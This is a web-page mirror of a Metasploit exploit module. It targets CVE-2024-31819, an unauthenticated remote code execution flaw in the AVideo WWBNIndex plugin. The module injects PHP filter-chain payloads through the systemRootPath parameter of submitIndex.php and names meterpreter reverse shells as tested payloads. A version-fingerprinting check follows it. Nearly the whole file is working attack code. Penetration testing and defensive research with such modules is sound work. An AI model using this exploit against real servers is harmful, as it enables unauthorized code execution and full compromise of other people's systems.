CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/http/avideo_wwbnindex_unauth_rce.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::HttpClient

10
  include Msf::Exploit::Remote::HTTP::PhpFilterChain

11
  prepend Msf::Exploit::Remote::AutoCheck

12


13
  def initialize(info = {})

14
    super(

15
      update_info(

16
        info,

17
        'Name' => 'AVideo WWBNIndex Plugin Unauthenticated RCE',

18
        'Description' => %q{

19
          This module exploits an unauthenticated remote code execution (RCE) vulnerability

20
          in the WWBNIndex plugin of the AVideo platform. The vulnerability exists within the

21
          `submitIndex.php` file, where user-supplied input is passed directly to the `require()`

22
          function without proper sanitization. By exploiting this, an attacker can leverage the

23
          PHP filter chaining technique to execute arbitrary PHP code on the server. This allows

24
          for the execution of commands and control over the affected system. The exploit is

25
          particularly dangerous because it does not require authentication, making it possible

26
          for any remote attacker to exploit this vulnerability.

27
        },

28
        'Author' => [

29
          'Valentin Lobstein'

30
        ],

31
        'License' => MSF_LICENSE,

32
        'References' => [

33
          ['CVE', '2024-31819'],

34
          ['URL', 'https://github.com/WWBN/AVideo'],

35
          ['URL', 'https://chocapikk.com/posts/2024/cve-2024-31819']

36
        ],

37
        'Platform' => ['php', 'unix', 'linux', 'win'],

38
        'Arch' => [ARCH_PHP, ARCH_CMD],

39
        'Targets' => [

40
          [

41
            'PHP In-Memory',

42
            {

43
              'Platform' => 'php',

44
              'Arch' => ARCH_PHP

45
              # tested with php/meterpreter/reverse_tcp

46
            }

47
          ],

48
          [

49
            'Unix In-Memory',

50
            {

51
              'Platform' => ['unix', 'linux'],

52
              'Arch' => ARCH_CMD

53
              # tested with cmd/linux/http/x64/meterpreter/reverse_tcp

54
            }

55
          ],

56
          [

57
            'Windows In-Memory',

58
            {

59
              'Platform' => 'win',

60
              'Arch' => ARCH_CMD

61
              # tested with cmd/windows/http/x64/meterpreter/reverse_tcp

62
            }

63
          ],

64
        ],

65
        'Privileged' => false,

66
        'DisclosureDate' => '2024-04-09',

67
        'Notes' => {

68
          'Stability' => [CRASH_SAFE],

69
          'Reliability' => [REPEATABLE_SESSION],

70
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]

71
        },

72
        'DefaultOptions' => {

73
          'SSL' => true,

74
          'RPORT' => 443,

75
          'FETCH_WRITABLE_DIR' => '/tmp'

76
        }

77
      )

78
    )

79
  end

80


81
  def exploit

82
    php_code = "<?php #{target['Arch'] == ARCH_PHP ? payload.encoded : "system(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}'));"} ?>"

83
    filter_payload = generate_php_filter_payload(php_code)

84
    res = send_request_cgi(

85
      'method' => 'POST',

86
      'uri' => normalize_uri(target_uri.path, 'plugin', 'WWBNIndex', 'submitIndex.php'),

87
      'ctype' => 'application/x-www-form-urlencoded',

88
      'data' => "systemRootPath=#{filter_payload}"

89
    )

90
    print_error("Server returned #{res.code}. Successful exploit attempts should not return a response.") if res&.code

91
  end

92


93
  def check

94
    res = send_request_cgi({

95
      'uri' => normalize_uri(target_uri.path, 'index.php'),

96
      'method' => 'GET',

97
      'follow_redirect' => true

98
    })

99
    return CheckCode::Unknown('Failed to connect to the target.') unless res

100
    return CheckCode::Unknown("Unexpected HTTP response code: #{res.code}") unless res.code == 200

101


102
    version_match = res.body.match(/Powered by AVideo ® Platform v([\d.]+)/) || res.body.match(/<!--.*?v:([\d.]+).*?-->/m)

103
    return CheckCode::Unknown('Unable to extract AVideo version.') unless version_match && version_match[1]

104


105
    version = Rex::Version.new(version_match[1])

106
    plugin_check = send_request_cgi({

107
      'uri' => normalize_uri(target_uri.path, 'plugin', 'WWBNIndex', 'submitIndex.php'),

108
      'method' => 'GET'

109
    })

110
    unless plugin_check&.code == 200

111
      CheckCode::Safe('Vulnerable plugin WWBNIndex was not detected')

112
    end

113


114
    if version.between?(Rex::Version.new('12.4'), Rex::Version.new('14.2'))

115
      return CheckCode::Appears("Detected vulnerable AVideo version: #{version}, with vulnerable plugin WWBNIndex running.")

116
    end

117


118
    CheckCode::Safe("Detected non-vulnerable AVideo version: #{version}")

119
  end

120
end

121


122